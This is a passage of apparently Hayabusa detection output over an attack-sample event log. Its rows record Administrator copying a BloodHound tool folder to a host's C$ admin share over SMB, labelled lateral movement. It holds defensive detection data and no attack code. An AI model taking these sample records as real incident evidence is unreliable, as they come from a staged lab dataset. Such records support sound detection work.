10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 